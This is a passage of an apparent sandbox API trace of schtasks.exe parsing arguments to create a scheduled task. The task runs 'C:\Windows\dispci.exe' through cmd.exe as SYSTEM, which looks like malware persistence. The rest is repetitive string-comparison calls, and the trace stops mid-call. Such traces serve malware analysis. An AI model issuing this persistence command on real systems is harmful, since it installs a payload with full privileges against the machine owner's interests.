(lpString="|end|") returned 5 [0017.880] lstrlenW (lpString="|TR|") returned 4 [0017.880] StrStrIW (lpFirst="|end|", lpSrch="|TR|") returned 0x0 [0017.880] SetLastError (dwErrCode=0x490) [0017.880] lstrlenW (lpString="showsid") returned 7 [0017.880] lstrlenW (lpString="showsid") returned 7 [0017.880] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] lstrlenW (lpString="TR") returned 2 [0017.880] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|showsid|") returned 9 [0017.880] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.880] lstrlenW (lpString="|showsid|") returned 9 [0017.880] lstrlenW (lpString="|TR|") returned 4 [0017.880] StrStrIW (lpFirst="|showsid|", lpSrch="|TR|") returned 0x0 [0017.880] SetLastError (dwErrCode=0x490) [0017.880] SetLastError (dwErrCode=0x490) [0017.880] SetLastError (dwErrCode=0x0) [0017.880] lstrlenW (lpString="/TR") returned 3 [0017.880] StrChrIW (lpStart="/TR", wMatch=0x3a) returned 0x0 [0017.880] SetLastError (dwErrCode=0x490) [0017.880] SetLastError (dwErrCode=0x0) [0017.880] lstrlenW (lpString="/TR") returned 3 [0017.880] SetLastError (dwErrCode=0x0) [0017.881] SetLastError (dwErrCode=0x0) [0017.881] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.881] lstrlenW (lpString="-/") returned 2 [0017.881] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0017.881] SetLastError (dwErrCode=0x490) [0017.881] SetLastError (dwErrCode=0x490) [0017.881] SetLastError (dwErrCode=0x0) [0017.881] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.881] StrChrIW (lpStart="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit", wMatch=0x3a) returned=":\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit" [0017.881] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.881] _memicmp (_Buf1=0x5b4ec0, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.881] _memicmp (_Buf1=0x5b4ef0, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.881] SetLastError (dwErrCode=0x7a) [0017.881] SetLastError (dwErrCode=0x0) [0017.881] SetLastError (dwErrCode=0x0) [0017.881] lstrlenW (lpString="C") returned 1 [0017.881] SetLastError (dwErrCode=0x490) [0017.881] SetLastError (dwErrCode=0x0) [0017.881] lstrlenW (lpString="C:\\Windows\\system32\\cmd.exe /C Start \"\" \"C:\\Windows\\dispci.exe\" -id 1550063777 && exit") returned 86 [0017.881] SetLastError (dwErrCode=0x0) [0017.882] SetLastError (dwErrCode=0x0) [0017.883] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0017.883] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0017.883] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0017.883] VerifyVersionInfoW (in: lpVersionInformation=0xacdd8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xacdd8) returned 1 [0017.883] SetLastError (dwErrCode=0x0) [0017.883] lstrlenW (lpString="create") returned 6 [0017.883] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0017.883] SetLastError (dwErrCode=0x490) [0017.883] SetLastError (dwErrCode=0x0) [0017.883] lstrlenW (lpString="create") returned 6 [0017.883] _memicmp (_Buf1=0x5b4d40, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.883] SetLastError (dwErrCode=0x0) [0017.883] _memicmp (_Buf1=0x5b4db8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.883] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b5bf8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0017.883] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0017.883] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x5b5e08 | out: lpData=0x5b5e08) returned 1 [0017.883] VerQueryValueW (in: pBlock=0x5b5e08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xacee0, puLen=0xacee4 | out: lplpBuffer=0xacee0*=0x5b61a4, puLen=0xacee4) returned 1 [0017.883] _memicmp (_Buf1=0x5b4db8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.883] _vsnwprintf (in: _Buffer=0x5b5bf8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xacec8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0017.883] VerQueryValueW (in: pBlock=0x5b5e08, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xacef0, puLen=0xaceec | out: lplpBuffer=0xacef0*=0x5b5fd0, puLen=0xaceec) returned 1 [0017.883] lstrlenW (lpString="schtasks.exe") returned 12 [0017.883] lstrlenW (lpString="schtasks.exe") returned 12 [0017.883] lstrlenW (lpString=".EXE") returned 4 [0017.883] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0017.883] lstrlenW (lpString="schtasks.exe") returned 12 [0017.883] lstrlenW (lpString=".EXE") returned 4 [0017.883] lstrlenW (lpString="schtasks") returned 8 [0017.883] lstrlenW (lpString="/create") returned 7 [0017.883] _memicmp (_Buf1=0x5b4db8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.883] _vsnwprintf (in: _Buffer=0x5b5bf8, _BufferCount=0x19, _Format="%s %s", _ArgList=0xacec8 | out: _Buffer="schtasks /create") returned 16 [0017.883] _memicmp (_Buf1=0x5b4e18, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.883] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.883] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0017.883] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0017.884] _vsnwprintf (in: _Buffer=0x5b67e8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xacecc | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0017.884] SetLastError (dwErrCode=0x0) [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="create") returned 6 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="?") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="s") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="u") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="p") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="ru") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="rp") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="sc") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="mo") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="d") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="m") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="i") returned 1 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="tn") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="tr") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="st") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="sd") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.884] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.884] lstrlenW (lpString="ed") returned 2 [0017.884] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="it") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="et") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="k") returned 1 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="du") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="ri") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="z") returned 1 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="f") returned 1 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="v1") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="xml") returned 3 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="ec") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="rl") returned 2 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="delay") returned 5 [0017.885] GetThreadLocale () returned 0x409 [0017.885] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.885] lstrlenW (lpString="np") returned 2 [0017.885] SetLastError (dwErrCode=0x0) [0017.885] SetLastError (dwErrCode=0x0) [0017.885] lstrlenW (lpString="/Create") returned 7 [0017.885] lstrlenW (lpString="-/") returned 2 [0017.885] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.885] lstrlenW (lpString="create") returned 6 [0017.885] lstrlenW (lpString="create") returned 6 [0017.885] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.885] lstrlenW (lpString="Create") returned 6 [0017.885] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.885] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|create|") returned 8 [0017.885] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|Create|") returned 8 [0017.885] lstrlenW (lpString="|create|") returned 8 [0017.885] lstrlenW (lpString="|Create|") returned 8 [0017.885] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0017.885] SetLastError (dwErrCode=0x0) [0017.885] SetLastError (dwErrCode=0x0) [0017.885] SetLastError (dwErrCode=0x0) [0017.885] lstrlenW (lpString="/RU") returned 3 [0017.885] lstrlenW (lpString="-/") returned 2 [0017.886] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.886] lstrlenW (lpString="create") returned 6 [0017.886] lstrlenW (lpString="create") returned 6 [0017.886] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] lstrlenW (lpString="RU") returned 2 [0017.886] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|create|") returned 8 [0017.886] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|RU|") returned 4 [0017.886] lstrlenW (lpString="|create|") returned 8 [0017.886] lstrlenW (lpString="|RU|") returned 4 [0017.886] StrStrIW (lpFirst="|create|", lpSrch="|RU|") returned 0x0 [0017.886] SetLastError (dwErrCode=0x490) [0017.886] lstrlenW (lpString="?") returned 1 [0017.886] lstrlenW (lpString="?") returned 1 [0017.886] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] lstrlenW (lpString="RU") returned 2 [0017.886] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|?|") returned 3 [0017.886] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|RU|") returned 4 [0017.886] lstrlenW (lpString="|?|") returned 3 [0017.886] lstrlenW (lpString="|RU|") returned 4 [0017.886] SetLastError (dwErrCode=0x490) [0017.886] lstrlenW (lpString="s") returned 1 [0017.886] lstrlenW (lpString="s") returned 1 [0017.886] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] lstrlenW (lpString="RU") returned 2 [0017.886] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|s|") returned 3 [0017.886] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|RU|") returned 4 [0017.886] lstrlenW (lpString="|s|") returned 3 [0017.886] lstrlenW (lpString="|RU|") returned 4 [0017.886] SetLastError (dwErrCode=0x490) [0017.886] lstrlenW (lpString="u") returned 1 [0017.886] lstrlenW (lpString="u") returned 1 [0017.886] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] lstrlenW (lpString="RU") returned 2 [0017.886] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|u|") returned 3 [0017.886] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|RU|") returned 4 [0017.886] lstrlenW (lpString="|u|") returned 3 [0017.886] lstrlenW (lpString="|RU|") returned 4 [0017.886] SetLastError (dwErrCode=0x490) [0017.886] lstrlenW (lpString="p") returned 1 [0017.886] lstrlenW (lpString="p") returned 1 [0017.886] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] lstrlenW (lpString="RU") returned 2 [0017.886] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.886] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|p|") returned 3 [0017.886] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|RU|") returned 4 [0017.886] lstrlenW (lpString="|p|") returned 3 [0017.886] lstrlenW (lpString="|RU|") returned 4 [0017.886] SetLastError (dwErrCode=0x490) [0017.886] lstrlenW (lpString="ru") returned 2 [0017.887] lstrlenW (lpString="ru") returned 2 [0017.887] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.887] lstrlenW (lpString="RU") returned 2 [0017.887] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.887] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|ru|") returned 4 [0017.887] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|RU|") returned 4 [0017.887] lstrlenW (lpString="|ru|") returned 4 [0017.887] lstrlenW (lpString="|RU|") returned 4 [0017.887] StrStrIW (lpFirst="|ru|", lpSrch="|RU|") returned="|ru|" [0017.887] SetLastError (dwErrCode=0x0) [0017.887] SetLastError (dwErrCode=0x0) [0017.887] lstrlenW (lpString="SYSTEM") returned 6 [0017.887] lstrlenW (lpString="-/") returned 2 [0017.887] StrChrIW (lpStart="-/", wMatch=0x53) returned 0x0 [0017.887] SetLastError (dwErrCode=0x490) [0017.887] SetLastError (dwErrCode=0x490) [0017.887] SetLastError (dwErrCode=0x0) [0017.887] lstrlenW (lpString="SYSTEM") returned 6 [0017.887] StrChrIW (lpStart="SYSTEM", wMatch=0x3a) returned 0x0 [0017.887] SetLastError (dwErrCode=0x490) [0017.887] SetLastError (dwErrCode=0x0) [0017.887] _memicmp (_Buf1=0x5b4ea8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.887] lstrlenW (lpString="SYSTEM") returned 6 [0017.887] lstrlenW (lpString="SYSTEM") returned 6 [0017.887] lstrlenW (lpString=" \x09") returned 2 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0017.887] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0017.887] GetLastError () returned 0x0 [0017.887] lstrlenW (lpString="SYSTEM") returned 6 [0017.887] SetLastError (dwErrCode=0x0) [0017.887] SetLastError (dwErrCode=0x0) [0017.887] lstrlenW (lpString="/SC") returned 3 [0017.887] lstrlenW (lpString="-/") returned 2 [0017.887] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.887] lstrlenW (lpString="create") returned 6 [0017.887] lstrlenW (lpString="create") returned 6 [0017.887] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.887] lstrlenW (lpString="SC") returned 2 [0017.887] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.887] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|create|") returned 8 [0017.887] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.887] lstrlenW (lpString="|create|") returned 8 [0017.887] lstrlenW (lpString="|SC|") returned 4 [0017.887] StrStrIW (lpFirst="|create|", lpSrch="|SC|") returned 0x0 [0017.887] SetLastError (dwErrCode=0x490) [0017.887] lstrlenW (lpString="?") returned 1 [0017.887] lstrlenW (lpString="?") returned 1 [0017.887] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] lstrlenW (lpString="SC") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|?|") returned 3 [0017.888] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.888] lstrlenW (lpString="|?|") returned 3 [0017.888] lstrlenW (lpString="|SC|") returned 4 [0017.888] SetLastError (dwErrCode=0x490) [0017.888] lstrlenW (lpString="s") returned 1 [0017.888] lstrlenW (lpString="s") returned 1 [0017.888] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] lstrlenW (lpString="SC") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|s|") returned 3 [0017.888] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.888] lstrlenW (lpString="|s|") returned 3 [0017.888] lstrlenW (lpString="|SC|") returned 4 [0017.888] SetLastError (dwErrCode=0x490) [0017.888] lstrlenW (lpString="u") returned 1 [0017.888] lstrlenW (lpString="u") returned 1 [0017.888] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] lstrlenW (lpString="SC") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|u|") returned 3 [0017.888] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.888] lstrlenW (lpString="|u|") returned 3 [0017.888] lstrlenW (lpString="|SC|") returned 4 [0017.888] SetLastError (dwErrCode=0x490) [0017.888] lstrlenW (lpString="p") returned 1 [0017.888] lstrlenW (lpString="p") returned 1 [0017.888] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] lstrlenW (lpString="SC") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|p|") returned 3 [0017.888] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.888] lstrlenW (lpString="|p|") returned 3 [0017.888] lstrlenW (lpString="|SC|") returned 4 [0017.888] SetLastError (dwErrCode=0x490) [0017.888] lstrlenW (lpString="ru") returned 2 [0017.888] lstrlenW (lpString="ru") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] lstrlenW (lpString="SC") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|ru|") returned 4 [0017.888] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.888] lstrlenW (lpString="|ru|") returned 4 [0017.888] lstrlenW (lpString="|SC|") returned 4 [0017.888] StrStrIW (lpFirst="|ru|", lpSrch="|SC|") returned 0x0 [0017.888] SetLastError (dwErrCode=0x490) [0017.888] lstrlenW (lpString="rp") returned 2 [0017.888] lstrlenW (lpString="rp") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.888] lstrlenW (lpString="SC") returned 2 [0017.888] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.889] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|rp|") returned 4 [0017.889] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|SC|") returned 4 [0017.889] lstrlenW (lpString="|rp|") returned 4 [0017.889] lstrlenW (lpString="|SC|") returned 4 [0017.889] StrStrIW (lpFirst="|rp|", lpSrch="|SC|") returned 0x0 [0017.889] SetLastError (dwErrCode=0x490) [0017.889] lstrlenW (lpString="sc") returned 2 [0017.889] lstrlenW (lpString="sc") returned 2 [0017.889] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.889] lstrlenW (lpString="SC") returned 2 [0017.889] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.889] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaceb4 | out: _Buffer="|sc|") returned 4 [0017.889] _vsnwprintf (in: 